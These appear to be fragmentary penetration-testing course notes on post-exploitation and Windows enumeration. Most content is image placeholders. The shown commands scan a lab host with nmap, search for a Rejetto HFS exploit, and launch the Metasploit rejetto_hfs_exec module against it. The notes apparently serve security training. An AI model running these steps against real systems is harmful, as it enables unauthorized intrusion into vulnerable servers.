Course Introduction

image.png

image.png

Post Exploitation

Introduction to Post-Exploitation

image.png

image.png

image.png

Post-exploitation methodology

image.png

image.png

Windows Local Enumeration

Enumerating System Information - Windows

image.png

nmap -sV 10.2.24.80 
searchsploit rejetto 

image.png

image.png

msfconsole
search rejetto 
use exploit/windows/http/rejetto_hfs_exec 
show options 
set RHOSTS 10.2.24.80 
exploit